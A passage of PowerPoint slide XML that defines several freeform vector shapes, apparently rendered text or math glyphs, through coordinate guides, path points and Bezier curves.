            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId82"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3660775" y="1670050"/>
              <a:ext cx="82550" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 211"/>
                <a:gd name="T1" fmla="*/ 92 h 280"/>
                <a:gd name="T2" fmla="*/ 180 w 211"/>
                <a:gd name="T3" fmla="*/ 92 h 280"/>
                <a:gd name="T4" fmla="*/ 200 w 211"/>
                <a:gd name="T5" fmla="*/ 77 h 280"/>
                <a:gd name="T6" fmla="*/ 180 w 211"/>
                <a:gd name="T7" fmla="*/ 62 h 280"/>
                <a:gd name="T8" fmla="*/ 98 w 211"/>
                <a:gd name="T9" fmla="*/ 62 h 280"/>
                <a:gd name="T10" fmla="*/ 98 w 211"/>
                <a:gd name="T11" fmla="*/ 21 h 280"/>
                <a:gd name="T12" fmla="*/ 81 w 211"/>
                <a:gd name="T13" fmla="*/ 0 h 280"/>
                <a:gd name="T14" fmla="*/ 64 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 21 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64 w 211"/>
                <a:gd name="T27" fmla="*/ 214 h 280"/>
                <a:gd name="T28" fmla="*/ 134 w 211"/>
                <a:gd name="T29" fmla="*/ 280 h 280"/>
                <a:gd name="T30" fmla="*/ 211 w 211"/>
                <a:gd name="T31" fmla="*/ 214 h 280"/>
                <a:gd name="T32" fmla="*/ 194 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 280"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 280"/>
                <a:gd name="T36" fmla="*/ 137 w 211"/>
                <a:gd name="T37" fmla="*/ 249 h 280"/>
                <a:gd name="T38" fmla="*/ 98 w 211"/>
                <a:gd name="T39" fmla="*/ 211 h 280"/>
                <a:gd name="T40" fmla="*/ 98 w 211"/>
                <a:gd name="T41" fmla="*/ 9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1" h="280">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="62"/>
                    <a:pt x="188" y="62"/>
                    <a:pt x="180" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="64" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="262"/>
                    <a:pt x="98" y="280"/>
                    <a:pt x="134" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="280"/>
                    <a:pt x="211" y="258"/>
                    <a:pt x="211" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="205"/>
                    <a:pt x="211" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="9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6" name="Freeform 187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{958D8CA5-5FA3-4776-829F-4DCF959BDDDE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId83"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3768725" y="1692275"/>
              <a:ext cx="77788" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 203"/>
                <a:gd name="T1" fmla="*/ 124 h 223"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 203"/>
                <a:gd name="T7" fmla="*/ 111 h 223"/>
                <a:gd name="T8" fmla="*/ 114 w 203"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 203 w 203"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 186 w 203"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 203"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 203"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 35 w 203"/>
                <a:gd name="T19" fmla="*/ 124 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 203"/>
                <a:gd name="T21" fmla="*/ 124 h 223"/>
                <a:gd name="T22" fmla="*/ 35 w 203"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 203"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 168 w 203"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 35 w 203"/>
                <a:gd name="T29" fmla="*/ 95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3" h="223">
                  <a:moveTo>
                    <a:pt x="184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="203" y="124"/>
                    <a:pt x="203" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="223"/>
                    <a:pt x="114" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="223"/>
                    <a:pt x="203" y="178"/>
                    <a:pt x="203" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="9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7" name="Freeform 188">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9716AC6-708B-4777-B775-4A15321F647B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId84"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3865562" y="1658938"/>
              <a:ext cx="90488" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 138 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 160 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 308"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 308"/>
                <a:gd name="T30" fmla="*/ 97 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 99 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 160 w 237"/>
                <a:gd name="T45" fmla="*/ 17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7" h="308">
                  <a:moveTo>
                    <a:pt x="160" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="298"/>
                    <a:pt x="160" y="305"/>
                    <a:pt x="180" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="305"/>
                    <a:pt x="237" y="305"/>
                    <a:pt x="237" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="274"/>
                    <a:pt x="224" y="274"/>
                    <a:pt x="217" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="131" y="30"/>
                    <a:pt x="138" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="160" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="123" y="87"/>
                    <a:pt x="102" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="87"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="259"/>
                    <a:pt x="44" y="308"/>
                    <a:pt x="97" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="308"/>
                    <a:pt x="146" y="294"/>
                    <a:pt x="160" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="236"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="99" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="34" y="242"/>
                    <a:pt x="34" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="150"/>
                    <a:pt x="69" y="117"/>
                    <a:pt x="104" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="160" y="145"/>
                    <a:pt x="160" y="17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8" name="Freeform 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37E7B085-54B5-4A5A-BFFB-9F16BB077A25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId85"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3975100" y="1643063"/>
              <a:ext cx="50800" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 193 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 132"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 16 w 132"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 132"/>
                <a:gd name="T9" fmla="*/ 26 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 132"/>
                <a:gd name="T11" fmla="*/ 193 h 387"/>
                <a:gd name="T12" fmla="*/ 12 w 132"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 132"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 16 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132"/>
                <a:gd name="T19" fmla="*/ 193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387">
                  <a:moveTo>
                    <a:pt x="132" y="193"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="134"/>
                    <a:pt x="109" y="89"/>
                    <a:pt x="91" y="64"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="28"/>
                    <a:pt x="28" y="0"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="6" y="25"/>
                    <a:pt x="8" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="80"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="243"/>
                    <a:pt x="79" y="312"/>
                    <a:pt x="12" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="363"/>
                    <a:pt x="0" y="365"/>
                    <a:pt x="0" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="377"/>
                    <a:pt x="3" y="387"/>
                    <a:pt x="16" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="387"/>
                    <a:pt x="132" y="321"/>
                    <a:pt x="132" y="1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199" name="Freeform 190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD8E848F-9A3D-43F5-A040-03611A82EE5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId86"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4198937" y="1755775"/>
              <a:ext cx="23813" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="63">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="3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00" name="Freeform 191">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3611D890-A2A3-4C2F-BF77-5C6CCC1BDE98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId87"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4298950" y="1755775"/>
              <a:ext cx="25400" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="63" h="63">
                  <a:moveTo>
                    <a:pt x="63" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="63" y="47"/>
                    <a:pt x="63" y="3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01" name="Freeform 192">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AB8BB19-AB23-4C99-9A97-1CCB375924AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId88"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4400550" y="1755775"/>
              <a:ext cx="23813" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="63">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="3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02" name="Freeform 193">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE27DA4-3EBD-4F8F-838B-3BA993851D8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId89"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1646237" y="1893888"/>
              <a:ext cx="88900" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 230"/>
                <a:gd name="T1" fmla="*/ 126 h 316"/>
                <a:gd name="T2" fmla="*/ 210 w 230"/>
                <a:gd name="T3" fmla="*/ 126 h 316"/>
                <a:gd name="T4" fmla="*/ 230 w 230"/>
                <a:gd name="T5" fmla="*/ 111 h 316"/>
                <a:gd name="T6" fmla="*/ 210 w 230"/>
                <a:gd name="T7" fmla="*/ 96 h 316"/>
                <a:gd name="T8" fmla="*/ 164 w 230"/>
                <a:gd name="T9" fmla="*/ 96 h 316"/>
                <a:gd name="T10" fmla="*/ 144 w 230"/>
                <a:gd name="T11" fmla="*/ 111 h 316"/>
                <a:gd name="T12" fmla="*/ 165 w 230"/>
                <a:gd name="T13" fmla="*/ 126 h 316"/>
                <a:gd name="T14" fmla="*/ 121 w 230"/>
                <a:gd name="T15" fmla="*/ 231 h 316"/>
                <a:gd name="T16" fmla="*/ 85 w 230"/>
                <a:gd name="T17" fmla="*/ 162 h 316"/>
                <a:gd name="T18" fmla="*/ 135 w 230"/>
                <a:gd name="T19" fmla="*/ 69 h 316"/>
                <a:gd name="T20" fmla="*/ 89 w 230"/>
                <a:gd name="T21" fmla="*/ 0 h 316"/>
                <a:gd name="T22" fmla="*/ 37 w 230"/>
                <a:gd name="T23" fmla="*/ 73 h 316"/>
                <a:gd name="T24" fmla="*/ 51 w 230"/>
                <a:gd name="T25" fmla="*/ 154 h 316"/>
                <a:gd name="T26" fmla="*/ 17 w 230"/>
                <a:gd name="T27" fmla="*/ 190 h 316"/>
